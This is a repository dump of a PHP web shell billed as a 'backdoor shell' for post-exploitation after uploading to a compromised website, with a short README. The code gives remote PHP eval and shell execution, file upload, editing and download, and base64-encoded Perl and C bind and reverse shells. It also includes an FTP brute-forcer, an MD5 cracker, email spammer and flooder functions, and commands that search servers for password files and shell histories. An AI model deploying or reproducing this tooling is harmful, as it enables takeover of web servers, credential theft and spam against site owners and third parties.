.::Black Hat | Ethical Hacking | Special Webshell

├── README.md └── bheh_shell.php /README.md: -------------------------------------------------------------------------------- 1 | # bheh_php_shell 2 | Black Hat Ethical Hacking | PHP Backdoor Shell v1.0 3 | 4 | For Educational Purpose Only! 5 | 6 | By SaintDruG // for Black Hat | Ethical Hacking // www.blackhatethicalhacking.com 7 | 8 | A Custom PHP Web Shell, used for penetration testing. 9 | 10 | Purpose: When you gain access to a website, and you have the ability to upload files, uploading this file, and running it will give you a set of tools and capabilities to take over and escalate using post exploitation in a fast timely manner. 11 | 12 | # Screenshot: 13 | ![alt text](https://blackhatethicalhacking.com/Bheh_Wev_shell.png) 14 | 15 | # Black Hat Ethical Hacking 16 | 17 | ![alt text](https://avatars1.githubusercontent.com/u/13942386?s=460&v=4) 18 | -------------------------------------------------------------------------------- /bheh_shell.php: -------------------------------------------------------------------------------- 1 | alert('Your shell script was succefully deleted!')"; 25 | } 26 | 27 | 28 | function md5_brute($hash,$log,$dict) 29 | { 30 | ignore_user_abort(1); 31 | set_time_limit(0); 32 | 33 | $fl = fopen($dict, "r"); 34 | $fl = fopen($log, "w"); 35 | $count = 0; 36 | if(!$dict){ 37 | return "Fill 'dictionary_file' field!"; 38 | }if(!$log){ 39 | return "Fill 'log_file' field!"; 40 | }elseif(!strlen($hash) == 0){ 41 | return "Fill 'md5_hash' field!"; 42 | }else{ 43 | while(!$feof($dict)){ 44 | $pass = fgets($dict); 45 | $brute_hash = md5($pass); 46 | if($brute_hash == $hash){ 47 | fputs($log, "$hash:$pass\n---"); 48 | fclose($dict); 49 | fclose($log); 50 | exit; 51 | }else{ 52 | $count = $count + 1; 53 | fputs($log, "$count passwords was bruted..."); 54 | } 55 | } 56 | fputs($log, "$count passwords are failed!"); 57 | } 58 | fclose($dict); 59 | fclose($log); 60 | } 61 | 62 | function port_bind($port,$pass,$method) 63 | { 64 | $perl = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS 65 | VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs 66 | JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV 67 | TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG 68 | lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK 69 | Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i 70 | Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N 71 | lIENPTk47DQpleGl0IDA7DQp9DQp9"; 72 | $c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS 73 | A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I 74 | GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt 75 | b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9 76 | pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF 77 | NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK 78 | ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog 79 | ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk 80 | 7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2 81 | 9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld 82 | 2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu 83 | dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp 84 | lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0="; 85 | 86 | if($method=='Perl') 87 | { 88 | fputs($i=fopen('/tmp/shlbck','w'),base64_decode($perl)); 89 | fclose($i); 90 | ex(which("perl")." /tmp/shlbck ".$port." &"); 91 | unlink("/tmp/shlbck"); 92 | return ex('ps -aux | grep shlbck'); 93 | } 94 | elseif($method=='C#') 95 | { 96 | fputs($i=fopen('/tmp/shlbck.c','w'),base64_decode($c)); 97 | fclose($i); 98 | ex("gcc shlbck.c -o shlbck"); 99 | unlink('shlbck.c'); 100 | ex("/tmp/shlbck ".$port." ".$pass." &"); 101 | unlink("/tmp/shlbck"); 102 | return ex('ps -aux | grep shlbck'); 103 | }else 104 | { 105 | return 'Choose method'; 106 | } 107 | 108 | } 109 | 110 | function backconnect($ip,$port,$method) 111 | { 112 | $perl = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj 113 | aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR 114 | hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT 115 | sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI 116 | kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi 117 | KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl 118 | OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; 119 | 120 | $c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC 121 | BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb 122 | SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd 123 | KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ 124 | sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC 125 | Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D 126 | QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp 127 | Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; 128 | 129 | if($method=='Perl') 130 | { 131 | fputs($i=fopen('/tmp/shlbck','w'),base64_decode($perl)); 132 | fclose($i); 133 | ex(which("perl")." /tmp/shlbck ".$ip." ".$port." &"); 134 | unlink("/tmp/shlbck"); 135 | return ex('netstat -an | grep -i listen'); 136 | } 137 | elseif($method=='C#') 138 | { 139 | fputs($i=fopen('/tmp/shlbck.c','w'),base64_decode($c)); 140 | fclose($i); 141 | ex("gcc shlbck.c -o shlbck"); 142 | unlink('shlbck.c'); 143 | ex("/tmp/shlbck ".$ip." ".$port." &"); 144 | unlink("/tmp/shlbck"); 145 | return ex('netstat -an | grep -i listen'); 146 | }else 147 | { 148 | return 'Choose method'; 149 | } 150 | } 151 | 152 | if($_POST['type']==11){download(stripslashes($_POST['value']));}; 153 | 154 | function download($dfilename) 155 | { 156 | $file=fopen($dfilename,"r"); 157 | ob_clean(); 158 | $filename = basename($dfilename); 159 | $filedump = fread($file,@filesize($dfilename)); 160 | fclose($file); 161 | header("Content-type: ".$mime_type); 162 | header("Content-disposition: attachment; filename=\"".$filename."\";"); 163 | echo $filedump; 164 | } 165 | 166 | function flooder($logf,$to,$from,$subject,$msg,$amount,$check) 167 | { 168 | ignore_user_abort(1); 169 | set_time_limit(0); 170 | 171 | $fl = fopen($logf, "w"); 172 | $count = 0; 173 | if(!$logf){ 174 | return "Fill 'log_file' field!"; 175 | }elseif(!$to){ 176 | return "Fill 'Send to' field!"; 177 | }elseif(!$from){ 178 | return "Fill 'From' field!"; 179 | }elseif(!$subject){ 180 | return "Fill 'Subject' field!"; 181 | }elseif(!$msg){ 182 | return "Fill 'Message' field!"; 183 | }elseif(!$amount){ 184 | return "Fill 'Amount' field!"; 185 | }else{ 186 | while($count < $amount){ 187 | mail("$to", "$subject", "$msg", "From: $from"); 188 | $count = $count + 1; 189 | $fl = fopen($logf, "w"); 190 | fputs($fl, "$count flood-letters was sended..."); 191 | fclose($fl); 192 | } 193 | if(strlen($check) != 0){ 194 | $check_text = "Done! $count flood-letters was sended!"; 195 | $check_sub = 'Check'; 196 | mail("$check", "$check_sub", "$check_text", "From: $from"); 197 | $fl = fopen($logf, "w"); 198 | fputs($fl, "Done! $count flood-letters was sended!"); 199 | } 200 | else{ 201 | $fl = fopen($logf, "w"); 202 | fputs($fl, "Done! $count flood-letters was sended!"); 203 | } 204 | } 205 | fclose($fl); 206 | } 207 | 208 | function ftp_brute($host,$ftp_users,$ftp_passwd,$ftp_log) 209 | { 210 | ignore_user_abort(1); 211 | set_time_limit(0); 212 | 213 | $fl = fopen($ftp_users, "r"); 214 | $fd = fopen($ftp_passwd, "r"); 215 | $fr = fopen($ftp_log, "a+"); 216 | if(!$host){ 217 | return "Fill 'Host' field!"; 218 | }elseif(!$ftp_users){ 219 | return "Fill 'ftp_users file' field!"; 220 | }elseif(!$ftp_passwd){ 221 | return "Fill 'ftp_passwd file' field!"; 222 | }elseif(!$ftp_log){ 223 | return "Fill 'ftp_log file' field!"; 224 | }elseif(!file_exists($ftp_users)){ 225 | return "File ".$ftp_users." doesn't exists!"; 226 | }elseif(!file_exists($ftp_passwd)){ 227 | return "File ".$ftp_passwd." doesn't exists!"; 228 | } 229 | else{ 230 | while(!feof($fd)){ 231 | $pass = fgets($fd); 232 | while(!feof($fl)){ 233 | $user = fgets($fl); 234 | $connect = ftp_connect($host); 235 | if(!$connect){ 236 | fputs($fr, "Enable connect to $host\n"); 237 | exit; 238 | }else{ 239 | $auth = ftp_login($connect, $user, $pass); 240 | if(!$auth){ 241 | ftp_quit($connect); 242 | } 243 | else{ 244 | fputs($fr, "$host:\n---$login:$pass\n---"); 245 | ftp_quit($connect); 246 | } 247 | } 248 | } 249 | } 250 | fputs($fr, "Done:\n"); 251 | fclose($fr); 252 | } 253 | fclose($fl); 254 | fclose($fd); 255 | } 256 | 257 | function spammer($from,$subject,$msg,$check,$elist,$logf) 258 | { 259 | ignore_user_abort(1); 260 | set_time_limit(0); 261 | 262 | $fp = fopen($elist. "r"); 263 | $fl = fopen($logf, "w"); 264 | $count = 0; 265 | if(!$from){ 266 | return "Fill 'From' field!"; 267 | }elseif(!$elist){ 268 | return "Fill 'Emails list' field!"; 269 | }elseif(!$logf){ 270 | return "Fill 'Log File' field!"; 271 | }elseif(!$msg){ 272 | return "Fill 'Message' field!"; 273 | }elseif(!$subject){ 274 | return "Fill 'Subject' field!"; 275 | }elseif(!file_exists($elist)){ 276 | return "File ".$elist." doesn't exists!"; 277 | }else{ 278 | while(!feof($fp)){ 279 | $to = fgets($fp); 280 | mail("$to", "$subject", "$msg", "From: $from"); 281 | $count = $count + 1; 282 | $fl = fopen($logf, "w"); 283 | fputs($fl, "$count letters was sent..."); 284 | fclose($fl); 285 | } 286 | if(strlen($check) != 0){ 287 | $check_text = "Done! $count letters was sent!"; 288 | $check_sub = 'Check'; 289 | mail("$check", "$check_sub", "$check_text", "From: $from"); 290 | $fl = fopen($logf, "w"); 291 | fputs($fl, "Done! $count letters was sent!\n"); 292 | } 293 | else{ 294 | $fl = fopen($logf, "w"); 295 | fputs($fl, "Done! $count letters was sent!"); 296 | } 297 | } 298 | fclose($fp); 299 | fclose($fl); 300 | } 301 | 302 | function alias($in) 303 | { 304 | if($in=="find apahce config file"){return ex('find / -type f -name httpd.conf');} 305 | elseif($in=="find access_log files"){return ex('find / -type f -name access_log');} 306 | elseif($in=="find error_log files"){return ex('find / -type f -name error_log');} 307 | elseif($in=="find suid files"){return ex('find / -type f -perm -04000 -ls');} 308 | elseif($in=="find suid files in current dir"){return ex('find . -type f -perm -04000 -ls');} 309 | elseif($in=="find sgid files"){return ex('find / -type f -perm -02000 -ls');} 310 | elseif($in=="find sgid files in current dir"){return ex('find . -type f -perm -02000 -ls');} 311 | elseif($in=="find config.inc.php files"){return ex('find / -type f -name config.inc.php');} 312 | elseif($in=="find config.inc.php files in current dir"){return ex('find . -type f -name config.inc.php');} 313 | elseif($in=="find config* files"){return ex('find / -type f -name "config*"');} 314 | elseif($in=="find config* files in current dir"){return ex('find . -type f -name "config*"');} 315 | elseif($in=="find all writable files"){return ex('find / -type f -perm -2 -ls');} 316 | elseif($in=="find all writable files in current dir"){return ex('find . -type f -perm -2 -ls');} 317 | elseif($in=="find all writable directories"){return ex('find / -type d -perm -2 -ls');} 318 | elseif($in=="find all writable directories in current dir"){return ex('find . -type d -perm -2 -ls');} 319 | elseif($in=="find all writable directories and files"){return ex('find / -perm -2 -ls');} 320 | elseif($in=="find all writable directories and files in current dir"){return ex('find . -perm -2 -ls');} 321 | elseif($in=="find all service.pwd files"){return ex('find / -type f -name service.pwd');} 322 | elseif($in=="find service.pwd files in current dir"){return ex('find . -type f -name service.pwd');} 323 | elseif($in=="find all .htpasswd files"){return ex('find / -type f -name .htpasswd');} 324 | elseif($in=="find .htpasswd files in current dir"){return ex('find . -type f -name .htpasswd');} 325 | elseif($in=="find all .bash_history files"){return ex('find / -type f -name .bash_history');} 326 | elseif($in=="find .bash_history files in current dir"){return ex('find . -type f -name .bash_history');} 327 | elseif($in=="find all .mysql_history files"){return ex('find / -type f -name .mysql_history');} 328 | elseif($in=="find .mysql_history files in current dir"){return ex('find . -type f -name .mysql_history');} 329 | elseif($in=="find all .fetchmailrc files"){return ex('find / -type f -name .fetchmailrc');} 330 | elseif($in=="find .fetchmailrc files in current dir"){return ex('find . -type f -name .fetchmailrc');} 331 | elseif($in=="list file attributes on a Linux second extended file system"){return ex('lsattr -va');} 332 | elseif($in=="show opened ports"){return ex('netstat -an | grep -i listen');} 333 | elseif($in=="---------------------------------------------------------------------------------------------------------"){return ex('ls -la');} 334 | } 335 | 336 | function testperl() 337 | { 338 | if(ex('perl -h')) 339 | { 340 | return "ON"; 341 | }else{ 342 | return "OFF"; 343 | } 344 | } 345 | 346 | function testlynx() 347 | { 348 | if(ex('lynx --help')) 349 | { 350 | return "ON"; 351 | }else{ 352 | return "OFF"; 353 | } 354 | } 355 | 356 | 357 | function view_size($size) 358 | { 359 | if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} 360 | elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} 361 | elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} 362 | else {$size = $size . " B";} 363 | return $size; 364 | } 365 | 366 | function testfetch() 367 | { 368 | if(ex('fetch --help')) 369 | { 370 | return "ON"; 371 | }else{ 372 | return "OFF"; 373 | } 374 | } 375 | 376 | function testwget() 377 | { 378 | if(ex('wget --help')) 379 | { 380 | return "ON"; 381 | }else{ 382 | return "OFF"; 383 | } 384 | } 385 | 386 | function oracle() 387 | { 388 | if(function_exists('ocilogon')) 389 | { 390 | return "ON"; 391 | }else{ 392 | return "OFF"; 393 | } 394 | } 395 | 396 | function postgresql() 397 | { 398 | if(function_exists('pg_connect')) 399 | { 400 | return "ON"; 401 | }else{ 402 | return "OFF"; 403 | } 404 | } 405 | 406 | function testmssql() 407 | { 408 | if(function_exists('mssql_connect')) 409 | { 410 | return "ON"; 411 | }else{ 412 | return "OFF"; 413 | } 414 | } 415 | function testcurl() 416 | { 417 | if(function_exists('curl_version')) 418 | { 419 | return "ON"; 420 | }else{ 421 | return "OFF"; 422 | } 423 | } 424 | function testmysql() 425 | { 426 | if(function_exists('mysql_connect')) 427 | { 428 | return "ON"; 429 | }else{ 430 | return "OFF"; 431 | } 432 | } 433 | function safe_mode() 434 | { 435 | if(!$safe_mode && strpos(ex("echo abch0ld"),"h0ld")!=3) 436 | { 437 | $_SESSION['safe_mode'] = 1; 438 | return "ON"; 439 | }else{ 440 | $_SESSION['safe_mode'] = 0; 441 | return "OFF"; 442 | } 443 | }; 444 | 445 | function ex($in) 446 | { 447 | $out = ''; 448 | 449 | 450 | if(function_exists('exec')) 451 | { 452 | exec($in,$out); 453 | $out = join("\n",$out); 454 | } 455 | elseif(function_exists('passthru')) 456 | { 457 | ob_start(); 458 | passthru($in); 459 | $out = ob_get_contents(); 460 | ob_end_clean(); 461 | } 462 | elseif(function_exists('system')) 463 | { 464 | ob_start(); 465 | system($in); 466 | $out = ob_get_contents(); 467 | ob_end_clean(); 468 | } 469 | elseif(function_exists('shell_exec')) 470 | { 471 | $out = shell_exec($in); 472 | } 473 | elseif(is_resource($f = popen($in,"r"))) 474 | { 475 | $out = ""; 476 | while(!@feof($f)) { $out .= fread($f,1024); } 477 | pclose($f); 478 | } 479 | return $out; 480 | } 481 | 482 | function shell() 483 | { 484 | if($_POST['type']==1) 485 | { 486 | eval(stripslashes($_POST['value'])); 487 | } 488 | elseif($_POST['type']==2) 489 | { 490 | pwd(); 491 | print_r(ex(stripslashes($_POST['value']))); 492 | } 493 | elseif($_POST['type']==3) 494 | { 495 | if($_SESSION['safe_mode'] == 1){ 496 | if(($u=safe_ex('ls -la'))!='') 497 | {return $u;}else{return safe_ex('dir');}; 498 | 499 | }else{ 500 | if(($u=ex('ls -la'))!='') 501 | {return $u;}else{return ex('dir');}; 502 | } 503 | } 504 | elseif($_POST['type']==4) 505 | { 506 | if(file_exists(stripslashes($_POST['value']))) 507 | { 508 | if($safe_mode!=1){ 509 | echo htmlspecialchars(fread(fopen(stripslashes($_POST['value']),"rw"),filesize(stripslashes($_POST['value'])))); 510 | }else{ 511 | echo htmlspecialchars(safe_read(stripslashes($_POST['value']))); 512 | }; 513 | $_SESSION['edit']=1; 514 | $_SESSION['filename'] = $_POST['value']; 515 | }else{ 516 | return 'File doesn\'t exists!'; 517 | } 518 | } 519 | elseif($_POST['type']==5) 520 | { 521 | fputs(fopen($_SESSION['filename'],"w"),stripslashes($_POST['value'])); 522 | } 523 | elseif($_POST['type']==6) 524 | { 525 | $uploaddir = pwd(); 526 | if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];}; 527 | move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name); 528 | } 529 | elseif($_POST['type']==7) 530 | { 531 | echo alias($_POST['value']); 532 | } 533 | elseif($_POST['type']==8) 534 | { 535 | echo spammer(stripslashes($_POST['from']),stripslashes($_POST['subject']),stripslashes($_POST['msg']),stripslashes($_POST['check']),stripslashes($_POST['elist']),stripslashes($_POST['logf'])); 536 | } 537 | elseif($_POST['type']==9) 538 | { 539 | echo ftp_brute(stripslashes($_POST['host']),stripslashes($_POST['users']),stripslashes($_POST['passwd']),stripslashes($_POST['log'])); 540 | } 541 | elseif($_POST['type']==10) 542 | { 543 | echo flooder(stripslashes($_POST['log']),stripslashes($_POST['to']),stripslashes($_POST['from']),stripslashes($_POST['subject']),stripslashes($_POST['msg']),stripslashes($_POST['amount']),stripslashes($_POST['check'])); 544 | } 545 | elseif($_POST['type']==12) 546 | { 547 | echo backconnect(stripslashes($_POST['ip']),stripslashes($_POST['port']),stripslashes($_POST['method'])); 548 | } 549 | elseif($_POST['type']==13) 550 | { 551 | echo backconnect(stripslashes($_POST['port']),stripslashes($_POST['pass']),stripslashes($_POST['method'])); 552 | } 553 | elseif($_POST['type']==14) 554 | { 555 | echo md5_brute(stripslashes($_POST['hash']),stripslashes($_POST['log']),stripslashes($_POST['dict'])); 556 | } 557 | 558 | else 559 | {$u = ex('ls -la'); 560 | if($u == ''){return ex('dir');}else{return $u;}; 561 | } 562 | 563 | return null; 564 | }; 565 | 566 | function edit() 567 | { 568 | if ($_SESSION['edit'] == 1){ 569 | $_SESSION['edit']=0; 570 | return "
";}; 571 | } 572 | 573 | function getsystem() 574 | { 575 | return php_uname('s')." ".php_uname('r')." ".php_uname('v'); 576 | }; 577 | 578 | function getserver() 579 | { 580 | return getenv("SERVER_SOFTWARE"); 581 | }; 582 | 583 | 584 | function getuser() 585 | { 586 | $out = get_current_user(); 587 | if($out!="SYSTEM") 588 | { 589 | if(($out=ex('id'))==''){$out = "uid=".getmyuid()."(".get_current_user().") gid=".getmygid();}; 590 | } 591 | return $out; 592 | }; 593 | 594 | function pwd() 595 | { 596 | if($_POST['type']==3) 597 | { 598 | $_SESSION['pwd'] = stripslashes($_POST['value']); 599 | } 600 | chdir($_SESSION['pwd']); 601 | $cwd = getcwd(); 602 | if($u=strrpos($cwd,'/')) 603 | { 604 | if($u!=strlen($cwd)-1){ 605 | return $cwd.'/';} 606 | else{return $cwd;}; 607 | } 608 | elseif($u=strrpos($cwd,'\\')) 609 | { 610 | if($u!=strlen($cwd)-1){ 611 | return $cwd.'\\';} 612 | else{return $cwd;}; 613 | }; 614 | } 615 | 616 | function safe_ex($in) 617 | { 618 | if($in){ 619 | $d=dir('.'); 620 | 621 | while (false!==($file=$d->read())) 622 | { 623 | if ($file=="." || $file=="..") continue; 624 | @clearstatcache(); 625 | list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file); 626 | if(!$unix){ 627 | echo date("d.m.Y H:i",$mtime)." "; 628 | if(@is_dir($file)) echo " "; else printf("% 7s ",$size); 629 | } 630 | else{ 631 | $owner = @posix_getpwuid($uid); 632 | $grgid = @posix_getgrgid($gid); 633 | echo $inode." "; 634 | echo perms(@fileperms($file)); 635 | printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size); 636 | echo date("d.m.Y H:i ",$mtime); 637 | } 638 | echo "$file\n"; 639 | } 640 | $d->close(); 641 | } 642 | 643 | function safe_read($in) 644 | { 645 | echo ini_get("safe_mode"); 646 | echo ini_get("open_basedir"); 647 | include("/etc/passwd"); 648 | ini_restore("safe_mode"); 649 | ini_restore("open_basedir"); 650 | echo ini_get("safe_mode"); 651 | echo ini_get("open_basedir"); 652 | 653 | file_get_contents($in); 654 | } 655 | 656 | } 657 | ?> 658 | 659 | 660 | 661 | 662 | 663 | 664 | 665 | 666 | 667 | 668 | 669 | 670 | .::Black Hat | Ethical Hacking | Special Webshell | Educational Purpose Only::. 671 | 672 | 680 | 691 | 692 | 693 | 694 | 852 | 1362 |

695 | 696 | 724 | 740 | 850 |

697 | 698 | 701 | 704 | 707 | 710 | 713 | 716 | 719 | 722 |

699 \| System: 700 \|	702 \| 703 \|
705 \| Server: 706 \|	708 \| 709 \|
711 \| User: 712 \|	714 \| 715 \|
717 \| pwd: 718 \|	720 \| 45){echo "...".substr($u,strlen($u)-40,40);}else{echo $u;};?> 721 \|

723 |

725 |

726 | 727 | 728 |

729 | .::h0ld-up-team::.
web-shell 730 |

731 |

732 | 733 | 734 | 735 | 736 | 737 |

738 | 739 |

741 | 742 | 779 | 796 | 813 | 814 | 831 | 848 |

743 | 744 | 747 | 750 | 753 | 756 | 759 |

745 | PHP-version: 746 |

748 | MySQL: 749 |

751 | MSSQL: 752 |

754 | PostgreSQL: 755 |

757 | Oracle: 758 |

760 |

761 | 762 | 765 | 768 | 771 | 774 | 777 |

763 | 764 |

766 | 767 |

769 | 770 |

772 | 773 |

775 | 776 |

778 |

780 | 783 | 786 | 789 | 792 | 795 |

781 | Safe_mode: 782 |

784 | cURL: 785 |

787 | wget: 788 |

790 | fetch: 791 |

793 | lynx: 794 |

797 | 800 | 803 | 806 | 809 | 812 |

798 | 799 |

801 | 802 |

804 | 805 |

807 | 808 |

810 | 811 |

815 | 818 | 821 | 824 | 827 | 830 |

816 | Perl: 817 |

819 | Server time: 820 |

822 | Server date: 823 |

825 | Total space: 826 |

828 | Free space: 829 |

832 | 835 | 838 | 841 | 844 | 847 |

833 | 834 |

836 | 837 |

839 | 840 |

842 | 843 |

845 | 846 |

849 |

851 |

853 | 854 | 1360 |

855 | 856 | 863 | 864 | 865 | 866 | 890 |

857 | 862 |

867 | 868 | 874 | 888 |

869 | .::System shell::.
870 | 871 | 872 | 873 |

875 | 887 |

889 |

891 | 892 | 893 |

894 | 895 | 921 | 993 | 1108 | 1128 | 1129 |

896 |

908 | 920 |

922 |

934 | 949 |

950 |

951 | 952 | 958 | 992 |

953 \| .::Alias::. 954 \|	955 \| 956 \| 957 \|
959 \| 991 \|

1109 | 1127 |

1130 |

1131 |

1132 | 1133 | 1163 |

1134 |

1164 |

1165 | 1166 | 1196 |

1167 |

1197 |

1198 |

1199 | 1202 | 1206 | 1207 | 1211 | 1212 | 1216 | 1217 | 1221 |

1200 \| .::md5 bruter::. 1201 \|

	1203 \| hash:	1204 \| 1205 \|

	1208 \| log_file:	1209 \| 1210 \|

	1213 \| dictionary_file:	1214 \| 1215 \|

	1218 \|	1219 \| 1220 \|

1222 |

1223 |

1224 |

1225 | 1226 | 1227 | 1358 |

1228 | 1229 | 1236 | 1241 | 1242 | 1247 | 1248 | 1253 | 1254 | 1259 | 1260 | 1265 | 1266 | 1271 |

1230 \| .::Spammer::. 1231 \|
1232 \| emails_file: 1233 \|	1234 \| 1235 \|

1237 \| log_file: 1238 \|	1239 \| 1240 \|

1243 \| From: 1244 \|	1245 \| 1246 \|

1249 \| Subject: 1250 \|	1251 \| 1252 \|

1255 \| Message: 1256 \|	1257 \| 1258 \|

1261 \| Check^*: 1262 \|	1263 \| 1264 \|

1267 \|	1268 \| 1269 \| 1270 \|

1272 |

1274 | 1275 | 1276 | 1281 | 1286 | 1287 | 1292 | 1293 | 1298 | 1299 | 1303 |

.::FTP-Brute::.
1277 \| Host: 1278 \|	1279 \| 1280 \|

1282 \| ftp_users file: 1283 \|	1284 \| 1285 \|

1288 \| ftp_passwd file: 1289 \|	1290 \| 1291 \|

1294 \| ftp_log file: 1295 \|	1296 \| 1297 \|

1300 \| 1301 \| 1302 \|

1304 |

